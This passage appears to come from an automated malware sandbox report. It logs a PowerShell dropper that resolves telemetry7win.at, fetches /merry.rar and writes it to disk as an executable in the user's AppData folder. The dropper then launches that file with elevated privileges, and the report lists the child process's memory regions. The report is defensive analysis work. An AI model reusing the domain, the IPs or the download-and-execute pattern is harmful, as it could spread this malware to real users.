| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = telemetry7win.at, address_out = 213.164.242.16, 85.105.167.110, 89.238.207.5, 109.239.19.225, 89.75.148.59, 94.190.179.160, 91.139.147.93, 90.177.80.171, 188.254.187.254, 109.121.206.4 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 213.164.242.16, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 80, size_out = 80 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = telemetry7win.at, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /merry.rar?SOiJ |
|
1 | |
| Inet | Send HTTP Request | headers = host: telemetry7win.at, connection: Keep-Alive, url = telemetry7win.at/merry.rar?SOiJ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 1345 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 1345 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8712 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8712 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 5971 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 21780 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 21780 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 21780 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 31944 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 31944 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 29300 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 13068 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 13068 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 13068 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 18253 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 18253 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 18253 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 21780 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 21780 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 21780 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 10988 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 10988 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 10988 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 32768 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 32768 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 32768 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 54216, size_out = 16788 |
|
1 | |
| Inet | Read Response | size = 54216, size_out = 16788 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 16788 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 37428, size_out = 32768 |
|
1 | |
| Inet | Read Response | size = 37428, size_out = 32768 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 32768 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4660, size_out = 4660 |
|
1 | |
| Inet | Read Response | size = 4660, size_out = 4660 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, size = 4660 |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
2 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\System32\Wbem, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\, type = file_attributes |
|
15 | |
| Environment | Get Environment String | name = PSMODULEPATH |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient\DnsClient.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\International\International.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI\iSCSI.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\ISE\ISE.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Kds\Kds.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellSnapIns |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, type = file_attributes |
|
3 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| Process | Create | process_name = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, show_window = SW_SHOWNORMAL |
|
1 |
Process #6: roamingeox20.exe
1974
24
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\5jghkoaofdp\appdata\roamingeox20.exe |
| Command Line | "C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:26, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbc8 |
| Parent PID | 0xb88 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | FIVAUF\5JgHKoaOfdp |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
38
0x
8E0
0x
8DC
0x
A34
0x
A30
0x
9E0
0x
3FC
0x
824
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x0004efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0005ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00166fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x00160fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00172fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001c0000 | 0x0023dfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00240fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00253fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x003f7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| roamingeox20.exe | 0x00400000 | 0x0043dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x00462fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x00443fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x00475fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x004d0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x004f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x00500fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x00510fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x00520fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x00540fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00550fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x00560fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x00570fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00586fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x00580fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00596fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00590fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| counters.dat | 0x005a0000 | 0x005a0fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000005b0000 | 0x005b0000 | 0x005effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x006effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00870fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x01c7ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01c82fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01c80fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001c90000 | 0x01c90000 | 0x01ccffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01cd2fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01cd0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01cd8fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d20000 | 0x01d20000 | 0x01d20fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d30000 | 0x01d30000 | 0x01d31fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| windowsshell.manifest | 0x01d40000 | 0x01d40fff | Memory Mapped File | Readable |
|
|
|
- |
| wshqos.dll | 0x01d40000 | 0x01d46fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01d41fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001d50000 | 0x01d50000 | 0x01d51fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d70000 | 0x01d70000 | 0x01e60fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01f6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x01f70000 | 0x02244fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002250000 | 0x02250000 | 0x0264bfff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002650000 | 0x02650000 | 0x0274ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002750000 | 0x02750000 | 0x0284ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x0294ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x02a4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| oleaut32.dll | 0x02a50000 | 0x02ad6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02a67fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002a70000 | 0x02a70000 | 0x02a70fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02a80fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02abffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02a92fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ac0000 | 0x02ac0000 | 0x02bbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002bc0000 | 0x02bc0000 | 0x02bc0fff | Private Memory | Readable, Writable |
|
|
|
- |
| msvcr100.dll | 0x73dd0000 | 0x73e8efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x741e0000 | 0x743c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x743d0000 | 0x74413fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x74420000 | 0x74426fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x74430000 | 0x74551fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x74560000 | 0x745dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x745e0000 | 0x745e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x745f0000 | 0x7460dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winhttp.dll | 0x74610000 | 0x746a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shcore.dll | 0x746b0000 | 0x74725fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74750000 | 0x7482afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x74830000 | 0x748c8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x748d0000 | 0x74914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x74920000 | 0x74928fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x74930000 | 0x74939fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x74940000 | 0x74948fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x74950000 | 0x7496cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74970000 | 0x7499efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x749a0000 | 0x749b7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x749c0000 | 0x749cdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x749d0000 | 0x749e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x749f0000 | 0x74c08fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x74c10000 | 0x74dccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74dd0000 | 0x74e22fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74e30000 | 0x74e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74e40000 | 0x74e5cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x74e60000 | 0x74f6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74f70000 | 0x75020fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x75030000 | 0x7517dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75180000 | 0x752cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x752d0000 | 0x75310fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75320000 | 0x7536cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x75370000 | 0x7651cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76520000 | 0x7665ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766f0000 | 0x767befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x76880000 | 0x7693dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76940000 | 0x7697dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x76980000 | 0x76985fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x76bc0000 | 0x76cc7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x76cd0000 | 0x76dc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76dd0000 | 0x76e56fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76e60000 | 0x76e84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76fe0000 | 0x76fe6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
